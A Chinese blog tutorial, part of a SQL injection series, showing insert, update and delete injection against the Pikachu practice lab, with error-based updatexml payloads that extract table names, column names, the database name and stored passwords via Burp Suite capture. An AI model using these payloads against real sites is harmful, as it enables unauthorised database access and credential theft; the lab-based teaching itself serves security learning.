SQL注入(四)之攻击类型与方式(中)

已于 2022-04-29 00:11:51 修改
阅读量402 收藏
点赞数 2
分类专栏: OWASP TOP10 文章标签: 网络安全 OWASP TOP 10
于 2021-03-27 17:42:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/115091831
版权

四 insert注入

	insert注入,就是前端注册的信息最终会被后台通过insert这个操作插入数据库,后台在接受前端的注册数据时没有做防SQL注入的处理,
导致前端的输入可以直接拼接SQL到后端的insert相关内容中,导致了insert注入。

01 填写注册信息

在这里插入图片描述

02 Burpsuit抓包

在这里插入图片描述

进入网站注册页面,填写网站注册相关信息,通过Burp抓包在用户名输入相关payload,格式如下:
steven' or updatexml(1,concat(0x7e,(命令)),0) or'

  1. 爆表名

     'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) or'

在这里插入图片描述
2. 爆列名

	' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0) or'

在这里插入图片描述

  1. 爆内容

     ' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'
  等同
 ' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or '1'='1''

在这里插入图片描述

五 update注入

01 登录 修改个人信息 页面

	与insert注入的方法大体相同,区别在于update用于用户登陆端,insert用于用于用户注册端。
	一般登录网站前台或后台更新用户信息的地方,填写用户需要修改相关信息,通过Burp抓包在用户名输入相关payload,格式如下:

	' or updatexml(0,concat(0x7e,(database())),0) or'

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

02 Burpsuit抓包

在这里插入图片描述

六 dalete注入

01 登录 delete 页面

在这里插入图片描述
在这里插入图片描述
复制得到的链接地址:

http://192.168.18.235:90/pikachu/vul/sqli/sqli_del.php?id=56

02 delete注入

一般应用于前后端发贴、留言、用户等相关删除操作,点击删除按钮时可通过Brup Suite抓包,对数据包相关delete参数进行注入,注入方法如下:

or updatexml(2,concat(0x7e,(database())),0)

在这里插入图片描述

Aτθ
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入方式
qq_43395215的博客
08-26 682
一、SQL注入的分类 ​ 1.1 基于服务器接收到的响应 ​ 报错的SQL注入 ​ 联合查询注入 ​ 堆查询注入 ​ SQL盲注 ​ 基于布尔SQL盲注 ​ 基于时间的SQL盲注 ​ 基于报错的SQL盲注 ​ 1.2 注入的数据类型 ​ 基于字符串 ​ 数字或整数 ​ 1.3 基于程度和顺序 ​ 一阶注入 ​ 注入的语句直接作用Web,然后产生结果,短暂的,结果显示后,攻击结束。 ​ 二阶注入 ​ 注入的语句存储于数据库,在对该数据操作时,会产生攻击攻击是持久的。 ​
SQL数据库不用SQL语句能显示全表的内容_SQL注入是什么?如何防御SQL注入
weixin_40003767的博客
11-16 310
什么是SQL注入SQL注入SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库的记录。SQL注入漏洞可能会影响使用SQL数据库(如M...
sql 注入方式
echocdzh的博客
12-08 277
1.寻找目标 目标网站:http://www.chencheng.com/index.php?id=407 2.测试目标 http://www.chencheng.com/index.php?id=407 and 1=1         返回正常 http://www.chencheng.com/index.php?id=407 and 1=2         返回异常 http://w
SQL注入()之攻击类型方式(上)
不秃头的程序Yang
03-22 455
SQL注入攻击类型方式 01 union注入 union操作符用于合并两个或多个SQL语句集合起来,得到联合的查询结果。 输入select id,email from member where username='kevin' union select username,pw from member where id=1; ...
sql注入攻击属于什么攻击_sql注入攻击已经很老了,但是仍然很相关,这就是为什么图表...
weixin_26751365的博客
10-11 784
sql注入攻击属于什么攻击Written by Johnathan Azaria and Ori Nakar由Johnathan Azaria和Ori Nakar撰写 We’re living in the Golden Age of data. Some companies analyze it to better themselves, others trade it for profit, ...
预防XSS攻击SQL注入XssFilter
05-19
这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS...
RFID系统两阶段规则的SQL注入攻击防御
10-17
SQL注入攻击是RFID系统的一个重要攻击方式,RFID系统的吞吐量较大,因此其防御方案应具有较高的计算效率,对此提出一种基于两阶段规则的SQL注入攻击防御方案。首先,按照合法数据域建立合法规则库;然后,对RFID标签...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
JSP 防范SQL注入攻击分析
01-08
SQL注入攻击的总体思路: 发现SQL注入位置; 判断服务器类型和后台数据库类型; 确定可执行情况 对于有些攻击者而言,一般会采取sql注入法。下面我也谈一下自己关于sql注入法的感悟。 注入法: 从理论上说,认证网页...
SQL注入()之攻击类型方式(下)
不秃头的程序Yang
03-28 310
七 http header注入 01 登录 02 刷新登录之后的页面,Burpsuit抓包 03 http header注入 在User-Agent输入payload: Mozilla' or updatexml(1,concat(0x7e,database ()),0) or ' 八 Cookie注入 01 cookie注入 利用http header注入部分的抓包结果进行注入: ' and updatexml (1,concat(0x7e,database()),0)# 九 布尔型盲
SQL注入攻击的种类和防范方法
zhendaaaaaaaaaa的博客
12-02 798
我们不妨看看the Asprox Trojan这种木马,它主要通过一个发布邮件的僵尸网络来传播,其整个工作过程可以这样描述:首先,通过受到控制的主机发送的垃圾邮件将此木马安装到电脑上,然后,受到此木马感染的电脑会下载一段二进制代码,在其启动时,它会使用搜索引擎搜索用微软的ASP技术建立表单的、有漏洞的网站。不过,目前支持这种特性的并不多。这种代码的设计目的是将一个特定的用户从其用户表取出,但是,如果用户名被一个恶意的用户用一种特定的方式伪造,这个语句所执行的操作可能就不仅仅是代码的作者所期望的那样了。
sql注入漏洞类型分类
liuy_uzhi的博客
08-09 5405
1、(基于错误的get单引号字符型注)'id='$id' 2、(基于错误的get整型注入)id=id 3、(基于错误的get单引号变形字符型注入)id=('$id')         4、(基于错误的GET双引号字符型注入)id=("$id") 5、盲注单引号字符型注入 5、盲注双引号字符型注入  ...
SQL注入攻击详解
谢世杰的博客
03-03 7922
一、什么是SQL注入 SQL 注入(SQLi)是一种注入攻击,,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库的记录。 SQL 注...
insert式注射攻击解析
weixin_30535913的博客
04-02 56
当碰到一些特殊的站时可以试着用insert注入(如:留言版神马的..前提是必须与数据库交互)首先我们先了解下insert的语法insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)当value值数大于column时,数据库就会爆出错误于是当我们在网页提交a’,null,nu...
SQL注入级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 5万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
1-3DML语言与INsert注入逻辑
山兔的博客
12-09 701
1.什么DML? DML:数据操作语言(data manipulation language) 功能:主要是对表、视图等对象进行查询、插入、更新和删除操作,如果我们没有特殊的说明,主要是对表的操作 包括: SELECT 查询 INSERT 插入 UPDATE 更新 DELETE 删除 实战演示 打开kali的终端,输入mysql -uroot,访问mysql数据库 我们这篇文章演示要用到一个示例的数据库,我们自己创一个数据库。create database hxf default charset utf8
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8252
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
grpcio-1.44.0-cp39-cp39-manylinux2010_x86_64.whl
最新发布
05-31
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示更有效地传达信息。
SQL 注入漏洞的攻击与防御 2
06-07
SQL注入攻击的防御主要有以下几种方式: 1. 使用参数化查询:使用参数化查询可以有效地防止SQL注入攻击,参数化查询是指将SQL语句的参数使用占位符代替,然后将参数的值单独传递给数据库引擎处理。这样,即使攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值